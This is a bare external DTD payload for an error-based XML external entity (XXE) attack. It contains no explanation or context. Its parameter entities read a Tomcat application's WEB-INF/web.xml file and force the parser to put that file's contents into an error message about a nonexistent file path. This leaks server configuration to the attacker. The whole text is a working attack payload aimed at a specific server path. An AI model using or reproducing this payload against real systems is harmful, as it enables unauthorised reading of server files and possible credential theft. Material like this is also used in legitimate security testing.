<!ENTITY % file SYSTEM "file:///var/lib/tomcat6/webapps/cosmos/WEB-INF/web.xml">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
